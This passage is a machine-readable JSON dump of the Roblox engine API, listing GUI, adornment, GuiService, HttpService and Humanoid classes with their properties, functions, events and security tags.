stance"}],"Name":"FocusLost","tags":[],"Class":"TextBox","type":"Event"},{"Arguments":[],"Name":"Focused","tags":[],"Class":"TextBox","type":"Event"},{"Superclass":"GuiBase2d","type":"Class","Name":"LayerCollector","tags":[]},{"Superclass":"LayerCollector","type":"Class","Name":"BillboardGui","tags":[]},{"ValueType":"bool","type":"Property","Name":"Active","tags":[],"Class":"BillboardGui"},{"ValueType":"Object","type":"Property","Name":"Adornee","tags":[],"Class":"BillboardGui"},{"ValueType":"bool","type":"Property","Name":"AlwaysOnTop","tags":[],"Class":"BillboardGui"},{"ValueType":"bool","type":"Property","Name":"Enabled","tags":[],"Class":"BillboardGui"},{"ValueType":"Vector3","type":"Property","Name":"ExtentsOffset","tags":[],"Class":"BillboardGui"},{"ValueType":"Object","type":"Property","Name":"PlayerToHideFrom","tags":[],"Class":"BillboardGui"},{"ValueType":"UDim2","type":"Property","Name":"Size","tags":[],"Class":"BillboardGui"},{"ValueType":"Vector2","type":"Property","Name":"SizeOffset","tags":[],"Class":"BillboardGui"},{"ValueType":"Vector3","type":"Property","Name":"StudsOffset","tags":[],"Class":"BillboardGui"},{"Superclass":"LayerCollector","type":"Class","Name":"ScreenGui","tags":[]},{"Superclass":"ScreenGui","type":"Class","Name":"GuiMain","tags":["deprecated"]},{"Superclass":"LayerCollector","type":"Class","Name":"SurfaceGui","tags":[]},{"ValueType":"bool","type":"Property","Name":"Active","tags":[],"Class":"SurfaceGui"},{"ValueType":"Object","type":"Property","Name":"Adornee","tags":[],"Class":"SurfaceGui"},{"ValueType":"bool","type":"Property","Name":"AlwaysOnTop","tags":[],"Class":"SurfaceGui"},{"ValueType":"Vector2","type":"Property","Name":"CanvasSize","tags":[],"Class":"SurfaceGui"},{"ValueType":"bool","type":"Property","Name":"Enabled","tags":[],"Class":"SurfaceGui"},{"ValueType":"NormalId","type":"Property","Name":"Face","tags":[],"Class":"SurfaceGui"},{"ValueType":"float","type":"Property","Name":"ToolPunchThroughDistance","tags":[],"Class":"SurfaceGui"},{"Superclass":"GuiBase","type":"Class","Name":"GuiBase3d","tags":[]},{"ValueType":"BrickColor","type":"Property","Name":"Color","tags":["deprecated","hidden"],"Class":"GuiBase3d"},{"ValueType":"Color3","type":"Property","Name":"Color3","tags":[],"Class":"GuiBase3d"},{"ValueType":"float","type":"Property","Name":"Transparency","tags":[],"Class":"GuiBase3d"},{"ValueType":"bool","type":"Property","Name":"Visible","tags":[],"Class":"GuiBase3d"},{"Superclass":"GuiBase3d","type":"Class","Name":"FloorWire","tags":["deprecated"]},{"ValueType":"float","type":"Property","Name":"CycleOffset","tags":[],"Class":"FloorWire"},{"ValueType":"Object","type":"Property","Name":"From","tags":[],"Class":"FloorWire"},{"ValueType":"float","type":"Property","Name":"StudsBetweenTextures","tags":[],"Class":"FloorWire"},{"ValueType":"Content","type":"Property","Name":"Texture","tags":[],"Class":"FloorWire"},{"ValueType":"Vector2","type":"Property","Name":"TextureSize","tags":[],"Class":"FloorWire"},{"ValueType":"Object","type":"Property","Name":"To","tags":[],"Class":"FloorWire"},{"ValueType":"float","type":"Property","Name":"Velocity","tags":[],"Class":"FloorWire"},{"ValueType":"float","type":"Property","Name":"WireRadius","tags":[],"Class":"FloorWire"},{"Superclass":"GuiBase3d","type":"Class","Name":"PVAdornment","tags":[]},{"ValueType":"Object","type":"Property","Name":"Adornee","tags":[],"Class":"PVAdornment"},{"Superclass":"PVAdornment","type":"Class","Name":"HandleAdornment","tags":[]},{"ValueType":"bool","type":"Property","Name":"AlwaysOnTop","tags":[],"Class":"HandleAdornment"},{"ValueType":"CoordinateFrame","type":"Property","Name":"CFrame","tags":[],"Class":"HandleAdornment"},{"ValueType":"Vector3","type":"Property","Name":"SizeRelativeOffset","tags":[],"Class":"HandleAdornment"},{"ValueType":"int","type":"Property","Name":"ZIndex","tags":[],"Class":"HandleAdornment"},{"Arguments":[],"Name":"MouseButton1Down","tags":[],"Class":"HandleAdornment","type":"Event"},{"Arguments":[],"Name":"MouseButton1Up","tags":[],"Class":"HandleAdornment","type":"Event"},{"Arguments":[],"Name":"MouseEnter","tags":[],"Class":"HandleAdornment","type":"Event"},{"Arguments":[],"Name":"MouseLeave","tags":[],"Class":"HandleAdornment","type":"Event"},{"Superclass":"HandleAdornment","type":"Class","Name":"BoxHandleAdornment","tags":[]},{"ValueType":"Vector3","type":"Property","Name":"Size","tags":[],"Class":"BoxHandleAdornment"},{"Superclass":"HandleAdornment","type":"Class","Name":"ConeHandleAdornment","tags":[]},{"ValueType":"float","type":"Property","Name":"Height","tags":[],"Class":"ConeHandleAdornment"},{"ValueType":"float","type":"Property","Name":"Radius","tags":[],"Class":"ConeHandleAdornment"},{"Superclass":"HandleAdornment","type":"Class","Name":"CylinderHandleAdornment","tags":[]},{"ValueType":"float","type":"Property","Name":"Height","tags":[],"Class":"CylinderHandleAdornment"},{"ValueType":"float","type":"Property","Name":"Radius","tags":[],"Class":"CylinderHandleAdornment"},{"Superclass":"HandleAdornment","type":"Class","Name":"ImageHandleAdornment","tags":[]},{"ValueType":"Content","type":"Property","Name":"Image","tags":[],"Class":"ImageHandleAdornment"},{"ValueType":"Vector2","type":"Property","Name":"Size","tags":[],"Class":"ImageHandleAdornment"},{"Superclass":"HandleAdornment","type":"Class","Name":"LineHandleAdornment","tags":[]},{"ValueType":"float","type":"Property","Name":"Length","tags":[],"Class":"LineHandleAdornment"},{"ValueType":"float","type":"Property","Name":"Thickness","tags":[],"Class":"LineHandleAdornment"},{"Superclass":"HandleAdornment","type":"Class","Name":"SphereHandleAdornment","tags":[]},{"ValueType":"float","type":"Property","Name":"Radius","tags":[],"Class":"SphereHandleAdornment"},{"Superclass":"PVAdornment","type":"Class","Name":"SelectionBox","tags":[]},{"ValueType":"float","type":"Property","Name":"LineThickness","tags":[],"Class":"SelectionBox"},{"ValueType":"BrickColor","type":"Property","Name":"SurfaceColor","tags":["deprecated","hidden"],"Class":"SelectionBox"},{"ValueType":"Color3","type":"Property","Name":"SurfaceColor3","tags":[],"Class":"SelectionBox"},{"ValueType":"float","type":"Property","Name":"SurfaceTransparency","tags":[],"Class":"SelectionBox"},{"Superclass":"PVAdornment","type":"Class","Name":"SelectionSphere","tags":[]},{"ValueType":"BrickColor","type":"Property","Name":"SurfaceColor","tags":["deprecated","hidden"],"Class":"SelectionSphere"},{"ValueType":"Color3","type":"Property","Name":"SurfaceColor3","tags":[],"Class":"SelectionSphere"},{"ValueType":"float","type":"Property","Name":"SurfaceTransparency","tags":[],"Class":"SelectionSphere"},{"Superclass":"GuiBase3d","type":"Class","Name":"PartAdornment","tags":[]},{"ValueType":"Object","type":"Property","Name":"Adornee","tags":[],"Class":"PartAdornment"},{"Superclass":"PartAdornment","type":"Class","Name":"HandlesBase","tags":[]},{"Superclass":"HandlesBase","type":"Class","Name":"ArcHandles","tags":[]},{"ValueType":"Axes","type":"Property","Name":"Axes","tags":[],"Class":"ArcHandles"},{"Arguments":[{"Name":"axis","Type":"Axis"}],"Name":"MouseButton1Down","tags":[],"Class":"ArcHandles","type":"Event"},{"Arguments":[{"Name":"axis","Type":"Axis"}],"Name":"MouseButton1Up","tags":[],"Class":"ArcHandles","type":"Event"},{"Arguments":[{"Name":"axis","Type":"Axis"},{"Name":"relativeAngle","Type":"float"},{"Name":"deltaRadius","Type":"float"}],"Name":"MouseDrag","tags":[],"Class":"ArcHandles","type":"Event"},{"Arguments":[{"Name":"axis","Type":"Axis"}],"Name":"MouseEnter","tags":[],"Class":"ArcHandles","type":"Event"},{"Arguments":[{"Name":"axis","Type":"Axis"}],"Name":"MouseLeave","tags":[],"Class":"ArcHandles","type":"Event"},{"Superclass":"HandlesBase","type":"Class","Name":"Handles","tags":[]},{"ValueType":"Faces","type":"Property","Name":"Faces","tags":[],"Class":"Handles"},{"ValueType":"HandlesStyle","type":"Property","Name":"Style","tags":[],"Class":"Handles"},{"Arguments":[{"Name":"face","Type":"NormalId"}],"Name":"MouseButton1Down","tags":[],"Class":"Handles","type":"Event"},{"Arguments":[{"Name":"face","Type":"NormalId"}],"Name":"MouseButton1Up","tags":[],"Class":"Handles","type":"Event"},{"Arguments":[{"Name":"face","Type":"NormalId"},{"Name":"distance","Type":"float"}],"Name":"MouseDrag","tags":[],"Class":"Handles","type":"Event"},{"Arguments":[{"Name":"face","Type":"NormalId"}],"Name":"MouseEnter","tags":[],"Class":"Handles","type":"Event"},{"Arguments":[{"Name":"face","Type":"NormalId"}],"Name":"MouseLeave","tags":[],"Class":"Handles","type":"Event"},{"Superclass":"PartAdornment","type":"Class","Name":"SurfaceSelection","tags":[]},{"ValueType":"NormalId","type":"Property","Name":"TargetSurface","tags":[],"Class":"SurfaceSelection"},{"Superclass":"GuiBase3d","type":"Class","Name":"SelectionLasso","tags":[]},{"ValueType":"Object","type":"Property","Name":"Humanoid","tags":[],"Class":"SelectionLasso"},{"Superclass":"SelectionLasso","type":"Class","Name":"SelectionPartLasso","tags":["deprecated"]},{"ValueType":"Object","type":"Property","Name":"Part","tags":[],"Class":"SelectionPartLasso"},{"Superclass":"SelectionLasso","type":"Class","Name":"SelectionPointLasso","tags":["deprecated"]},{"ValueType":"Vector3","type":"Property","Name":"Point","tags":[],"Class":"SelectionPointLasso"},{"Superclass":"GuiBase3d","type":"Class","Name":"TextureTrail","tags":["deprecated"]},{"ValueType":"float","type":"Property","Name":"CycleOffset","tags":["RobloxPlaceSecurity"],"Class":"TextureTrail"},{"ValueType":"Object","type":"Property","Name":"From","tags":["RobloxPlaceSecurity"],"Class":"TextureTrail"},{"ValueType":"float","type":"Property","Name":"StudsBetweenTextures","tags":["RobloxPlaceSecurity"],"Class":"TextureTrail"},{"ValueType":"Content","type":"Property","Name":"Texture","tags":["RobloxPlaceSecurity"],"Class":"TextureTrail"},{"ValueType":"Vector2","type":"Property","Name":"TextureSize","tags":["RobloxPlaceSecurity"],"Class":"TextureTrail"},{"ValueType":"Object","type":"Property","Name":"To","tags":["RobloxPlaceSecurity"],"Class":"TextureTrail"},{"ValueType":"float","type":"Property","Name":"Velocity","tags":["RobloxPlaceSecurity"],"Class":"TextureTrail"},{"Superclass":"Instance","type":"Class","Name":"GuiItem","tags":[]},{"Superclass":"GuiItem","type":"Class","Name":"Backpack","tags":[]},{"Superclass":"GuiItem","type":"Class","Name":"BackpackItem","tags":[]},{"ValueType":"Content","type":"Property","Name":"TextureId","tags":[],"Class":"BackpackItem"},{"Superclass":"BackpackItem","type":"Class","Name":"HopperBin","tags":["deprecated"]},{"ValueType":"bool","type":"Property","Name":"Active","tags":[],"Class":"HopperBin"},{"ValueType":"BinType","type":"Property","Name":"BinType","tags":[],"Class":"HopperBin"},{"ReturnType":"void","Arguments":[],"Name":"Disable","tags":["RobloxScriptSecurity"],"Class":"HopperBin","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ToggleSelect","tags":["RobloxScriptSecurity"],"Class":"HopperBin","type":"Function"},{"Arguments":[],"Name":"Deselected","tags":[],"Class":"HopperBin","type":"Event"},{"Arguments":[{"Name":"mouse","Type":"Instance"}],"Name":"Selected","tags":[],"Class":"HopperBin","type":"Event"},{"Superclass":"BackpackItem","type":"Class","Name":"Tool","tags":[]},{"ValueType":"bool","type":"Property","Name":"CanBeDropped","tags":[],"Class":"Tool"},{"ValueType":"bool","type":"Property","Name":"Enabled","tags":[],"Class":"Tool"},{"ValueType":"CoordinateFrame","type":"Property","Name":"Grip","tags":[],"Class":"Tool"},{"ValueType":"Vector3","type":"Property","Name":"GripForward","tags":[],"Class":"Tool"},{"ValueType":"Vector3","type":"Property","Name":"GripPos","tags":[],"Class":"Tool"},{"ValueType":"Vector3","type":"Property","Name":"GripRight","tags":[],"Class":"Tool"},{"ValueType":"Vector3","type":"Property","Name":"GripUp","tags":[],"Class":"Tool"},{"ValueType":"bool","type":"Property","Name":"ManualActivationOnly","tags":[],"Class":"Tool"},{"ValueType":"bool","type":"Property","Name":"RequiresHandle","tags":[],"Class":"Tool"},{"ValueType":"string","type":"Property","Name":"ToolTip","tags":[],"Class":"Tool"},{"ReturnType":"void","Arguments":[],"Name":"Activate","tags":[],"Class":"Tool","type":"Function"},{"Arguments":[],"Name":"Activated","tags":[],"Class":"Tool","type":"Event"},{"Arguments":[],"Name":"Deactivated","tags":[],"Class":"Tool","type":"Event"},{"Arguments":[{"Name":"mouse","Type":"Instance"}],"Name":"Equipped","tags":[],"Class":"Tool","type":"Event"},{"Arguments":[],"Name":"Unequipped","tags":[],"Class":"Tool","type":"Event"},{"Superclass":"Tool","type":"Class","Name":"Flag","tags":["deprecated"]},{"ValueType":"BrickColor","type":"Property","Name":"TeamColor","tags":[],"Class":"Flag"},{"Superclass":"GuiItem","type":"Class","Name":"ButtonBindingWidget","tags":[]},{"Superclass":"GuiItem","type":"Class","Name":"GuiRoot","tags":["notCreatable"]},{"Superclass":"GuiItem","type":"Class","Name":"Hopper","tags":["deprecated"]},{"Superclass":"GuiItem","type":"Class","Name":"StarterPack","tags":[]},{"Superclass":"Instance","type":"Class","Name":"GuiService","tags":["notCreatable"]},{"ValueType":"bool","type":"Property","Name":"AutoSelectGuiEnabled","tags":[],"Class":"GuiService"},{"ValueType":"bool","type":"Property","Name":"CoreGuiNavigationEnabled","tags":[],"Class":"GuiService"},{"ValueType":"bool","type":"Property","Name":"GuiNavigationEnabled","tags":[],"Class":"GuiService"},{"ValueType":"bool","type":"Property","Name":"IsModalDialog","tags":["deprecated","readonly"],"Class":"GuiService"},{"ValueType":"bool","type":"Property","Name":"IsWindows","tags":["deprecated","readonly"],"Class":"GuiService"},{"ValueType":"bool","type":"Property","Name":"MenuIsOpen","tags":["readonly"],"Class":"GuiService"},{"ValueType":"bool","type":"Property","Name":"ScreenGuiEnabled","tags":["RobloxScriptSecurity"],"Class":"GuiService"},{"ValueType":"Object","type":"Property","Name":"SelectedCoreObject","tags":["RobloxScriptSecurity"],"Class":"GuiService"},{"ValueType":"Object","type":"Property","Name":"SelectedObject","tags":[],"Class":"GuiService"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"dialog","Default":null},{"Type":"CenterDialogType","Name":"centerDialogType","Default":null},{"Type":"Function","Name":"showFunction","Default":null},{"Type":"Function","Name":"hideFunction","Default":null}],"Name":"AddCenterDialog","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"AddKey","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"selectionName","Default":null},{"Type":"Instance","Name":"selectionParent","Default":null}],"Name":"AddSelectionParent","tags":[],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"selectionName","Default":null},{"Type":"Tuple","Name":"selections","Default":null}],"Name":"AddSelectionTuple","tags":[],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"SpecialKey","Name":"key","Default":null}],"Name":"AddSpecialKey","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"int","Arguments":[],"Name":"GetBrickCount","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"Vector3","Name":"position","Default":null}],"Name":"GetClosestDialogToPosition","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"string","Arguments":[],"Name":"GetErrorMessage","tags":["RobloxScriptSecurity","deprecated"],"Class":"GuiService","type":"Function"},{"ReturnType":"string","Arguments":[],"Name":"GetUiMessage","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"IsTenFootInterface","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"OpenBrowserWindow","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"dialog","Default":null}],"Name":"RemoveCenterDialog","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"RemoveKey","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"selectionName","Default":null}],"Name":"RemoveSelectionGroup","tags":[],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"SpecialKey","Name":"key","Default":null}],"Name":"RemoveSpecialKey","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"errorMessage","Default":null}],"Name":"SetErrorMessage","tags":["LocalUserSecurity","deprecated"],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"x1","Default":null},{"Type":"int","Name":"y1","Default":null},{"Type":"int","Name":"x2","Default":null},{"Type":"int","Name":"y2","Default":null}],"Name":"SetGlobalGuiInset","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"open","Default":null}],"Name":"SetMenuIsOpen","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"UiMessageType","Name":"msgType","Default":null},{"Type":"string","Name":"uiMessage","Default":null}],"Name":"SetUiMessage","tags":["LocalUserSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"string","Name":"input","Default":null}],"Name":"ShowStatsBasedOnInputString","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ToggleFullscreen","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"Vector2","Arguments":[],"Name":"GetScreenResolution","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"YieldFunction"},{"Arguments":[],"Name":"BrowserWindowClosed","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Event"},{"Arguments":[{"Name":"newErrorMessage","Type":"string"}],"Name":"ErrorMessageChanged","tags":["RobloxScriptSecurity","deprecated"],"Class":"GuiService","type":"Event"},{"Arguments":[],"Name":"EscapeKeyPressed","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Event"},{"Arguments":[{"Name":"key","Type":"string"},{"Name":"modifiers","Type":"string"}],"Name":"KeyPressed","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Event"},{"Arguments":[],"Name":"MenuClosed","tags":[],"Class":"GuiService","type":"Event"},{"Arguments":[],"Name":"MenuOpened","tags":[],"Class":"GuiService","type":"Event"},{"Arguments":[],"Name":"ShowLeaveConfirmation","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Event"},{"Arguments":[{"Name":"key","Type":"SpecialKey"},{"Name":"modifiers","Type":"string"}],"Name":"SpecialKeyPressed","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Event"},{"Arguments":[{"Name":"msgType","Type":"UiMessageType"},{"Name":"newUiMessage","Type":"string"}],"Name":"UiMessageChanged","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Event"},{"ReturnType":"void","Arguments":[{"Name":"title","Type":"string"},{"Name":"text","Type":"string"}],"Name":"SendCoreUiNotification","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Callback"},{"Superclass":"Instance","type":"Class","Name":"GuidRegistryService","tags":[]},{"Superclass":"Instance","type":"Class","Name":"HapticService","tags":["notCreatable"]},{"ReturnType":"Tuple","Arguments":[{"Type":"UserInputType","Name":"inputType","Default":null},{"Type":"VibrationMotor","Name":"vibrationMotor","Default":null}],"Name":"GetMotor","tags":[],"Class":"HapticService","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"UserInputType","Name":"inputType","Default":null},{"Type":"VibrationMotor","Name":"vibrationMotor","Default":null}],"Name":"IsMotorSupported","tags":[],"Class":"HapticService","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"UserInputType","Name":"inputType","Default":null}],"Name":"IsVibrationSupported","tags":[],"Class":"HapticService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"UserInputType","Name":"inputType","Default":null},{"Type":"VibrationMotor","Name":"vibrationMotor","Default":null},{"Type":"Tuple","Name":"vibrationValues","Default":null}],"Name":"SetMotor","tags":[],"Class":"HapticService","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"HttpRbxApiService","tags":["notCreatable"]},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"apiUrlPath","Default":null},{"Type":"bool","Name":"useHttps","Default":"true"},{"Type":"ThrottlingPriority","Name":"priority","Default":"Default"}],"Name":"GetAsync","tags":["RobloxScriptSecurity"],"Class":"HttpRbxApiService","type":"YieldFunction"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"apiUrlPath","Default":null},{"Type":"string","Name":"data","Default":null},{"Type":"bool","Name":"useHttps","Default":"true"},{"Type":"ThrottlingPriority","Name":"priority","Default":"Default"},{"Type":"HttpContentType","Name":"content_type","Default":"ApplicationJson"}],"Name":"PostAsync","tags":["RobloxScriptSecurity"],"Class":"HttpRbxApiService","type":"YieldFunction"},{"Superclass":"Instance","type":"Class","Name":"HttpService","tags":["notCreatable"]},{"ValueType":"bool","type":"Property","Name":"HttpEnabled","tags":["LocalUserSecurity"],"Class":"HttpService"},{"ReturnType":"string","Arguments":[{"Type":"bool","Name":"wrapInCurlyBraces","Default":"true"}],"Name":"GenerateGUID","tags":[],"Class":"HttpService","type":"Function"},{"ReturnType":"Variant","Arguments":[{"Type":"string","Name":"input","Default":null}],"Name":"JSONDecode","tags":[],"Class":"HttpService","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"Variant","Name":"input","Default":null}],"Name":"JSONEncode","tags":[],"Class":"HttpService","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"input","Default":null}],"Name":"UrlEncode","tags":[],"Class":"HttpService","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"url","Default":null},{"Type":"bool","Name":"nocache","Default":"false"}],"Name":"GetAsync","tags":[],"Class":"HttpService","type":"YieldFunction"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"url","Default":null},{"Type":"string","Name":"data","Default":null},{"Type":"HttpContentType","Name":"content_type","Default":"ApplicationJson"},{"Type":"bool","Name":"compress","Default":"false"}],"Name":"PostAsync","tags":[],"Class":"HttpService","type":"YieldFunction"},{"Superclass":"Instance","type":"Class","Name":"Humanoid","tags":[]},{"ValueType":"bool","type":"Property","Name":"AutoJumpEnabled","tags":[],"Class":"Humanoid"},{"ValueType":"bool","type":"Property","Name":"AutoRotate","tags":[],"Class":"Humanoid"},{"ValueType":"Vector3","type":"Property","Name":"CameraOffset","tags":[],"Class":"Humanoid"},{"ValueType":"HumanoidDisplayDistanceType","type":"Property","Name":"DisplayDistanceType","tags":[],"Class":"Humanoid"},{"ValueType":"float","type":"Property","Name":"Health","tags":[],"Class":"Humanoid"},{"ValueType":"float","type":"Property","Name":"HealthDisplayDistance","tags":[],"Class":"Humanoid"},{"ValueType":"float","type":"Property","Name":"HipHeight","tags":[],"Class":"Humanoid"},{"ValueType":"bool","type":"Property","Name":"Jump","tags":[],"Class":"Humanoid"},{"ValueType":"float","type":"Property","Name":"JumpPower","tags":[],"Class":"Humanoid"},{"ValueType":"Object","type":"Property","Name":"LeftLeg","tags":[],"Class":"Humanoid"},{"ValueType":"float","type":"Property","Name":"MaxHealth","tags":[],"Class":"Humanoid"},{"ValueType":"float","type":"Property","Name":"MaxSlopeAngle","tags":[],"Class":"Humanoid"},{"ValueType":"Vector3","type":"Property","Name":"MoveDirection","tags":["readonly"],"Class":"Humanoid"},{"ValueType":"float","type":"Property","Name":"NameDisplayDistance","tags":[],"Class":"Humanoid"},{"ValueType":"NameOcclusion","type":"Property","Name":"NameOcclusion","tags":[],"Class":"Humanoid"},{"ValueType":"bool","type":"Property","Name":"PlatformStand","tags":[],"Class":"Humanoid"},{"ValueType":"HumanoidRigType","type":"Property","Name":"RigType","tags":[],"Class":"Humanoid"},{"ValueType":"Object","type":"Property","Name":"RightLeg","tags":[],"Class":"Humanoid"},{"ValueType":"Object","type":"Property","Name":"SeatPart","tags":["readonly"],"Class":"Humanoid"},{"ValueType":"bool","type":"Property","Name":"Sit","tags":[],"Class":"Humanoid"},{"ValueType":"Vector3","type":"Property","Name":"TargetPoint","tags":[],"Class":"Humanoid"},{"ValueType":"Object","type":"Property","Name":"Torso","tags":[],"Class":"Humanoid"},{"ValueType":"float","type":"Property","Name":"WalkSpeed","tags":[],"Class":"Humanoid"},{"ValueType":"Object","type":"Property","Name":"WalkToPart","tags":[],"Class":"Humanoid"},{"ValueType":"Vector3","type":"Property","Name":"WalkToPoint","tags":[],"Class":"Humanoid"},{"ValueType":"float","type":"Property","Name":"maxHealth","tags":["deprecated"],"Class":"Humanoid"},{"ReturnType":"bool","Arguments":[{"Type":"string","Name":"status","Default":null}],"Name":"AddCustomStatus","tags":["deprecated"],"Class":"Humanoid","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"Status","Name":"status","Default":"Poison"}],"Name":"AddStatus","tags":["deprecated"],"Class":"Humanoid","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"HumanoidStateType","Name":"state","Default":"None"}],"Name":"ChangeState","tags":[],"Class":"Humanoid","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"tool","Default":null}],"Name":"EquipTool","tags":[],"Class":"Humanoid","type":"Function"},{"ReturnType":"Array","Arguments":[],"Name":"GetPlayingAnimationTracks","tags":[],"Class":"Humanoid","type":"Function"},{"ReturnType":"HumanoidStateType","Arguments":[],"Name":"GetState","tags":[],"Class":"Humanoid","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"HumanoidStateType","Name":"state","Default":null}],"Name":"GetStateEnabled","tags":[],"Class":"Humanoid","type":"Function"},{"ReturnType":"Array","Arguments":[],"Name":"GetStatuses","tags":["deprecated"],"Class":"Humanoid","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"string","Name":"status","Default":null}],"Name":"HasCustomStatus","tags":["deprecated"],"Class":"Humanoid","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"Status","Name":"status","Default":"Poison"}],"Name":"HasStatus","tags":["deprecated"],"Class":"Humanoid","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"Instance","Name":"animation","Default":null}],"Name":"LoadAnimation","tags":[],"Class":"Humanoid","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector3","Name":"moveDirection","Default":null},{"Type":"bool","Name":"relativeToCamera","Default":"false"}],"Name":"Move","tags":[],"Class":"Humanoid","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector3","Name":"location","Default":null},{"Type":"Instance","Name":"part","Default":"nil"}],"Name":"MoveTo","tags":[],"Class":"Humanoid","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"string","Name":"status","Default":null}],"Name":"RemoveCustomStatus","tags":["deprecated"],"Class":"Humanoid","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"Status","Name":"status","Default":"Poison"}],"Name":"RemoveStatus","tags":["deprecated"],"Class":"Humanoid","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"enabled","Default":null}],"Name":"SetClickToWalkEnabled","tags":["RobloxScriptSecurity"],"Class":"Humanoid","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"HumanoidStateType","Name":"state","Default":null},{"Type":"bool","Name":"enabled","Default":null}],"Name":"SetStateEnabled","tags":[],"Class":"Humanoid","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"float","Name":"amount","Default":null}],"Name":"TakeDamage","tags":[],"Class":"Humanoid","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"UnequipTools","tags":[],"Class":"Humanoid","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"Instance","Name":"animation","Default":null}],"Name":"loadAnimation","tags":["deprecated"],"Class":"Humanoid","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"float","Name":"amount","Default":null}],"Name":"takeDamage","tags":["deprecated"],"Class":"Humanoid","type":"Function"},{"Arguments":[{"Name":"animationTrack","Type":"Instance"}],"Name":"AnimationPlayed","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"speed","Type":"float"}],"Name":"Climbing","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"status","Type":"string"}],"Name":"CustomStatusAdded","tags":["deprecated"],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"status","Type":"string"}],"Name":"CustomStatusRemoved","tags":["deprecated"],"Class":"Humanoid","type":"Event"},{"Arguments":[],"Name":"Died","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"active","Type":"bool"}],"Name":"FallingDown","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"active","Type":"bool"}],"Name":"FreeFalling","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"active","Type":"bool"}],"Name":"GettingUp","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"health","Type":"float"}],"Name":"HealthChanged","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"active","Type":"bool"}],"Name":"Jumping","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"reached","Type":"bool"}],"Name":"MoveToFinished","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"active","Type":"bool"}],"Name":"PlatformStanding","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"active","T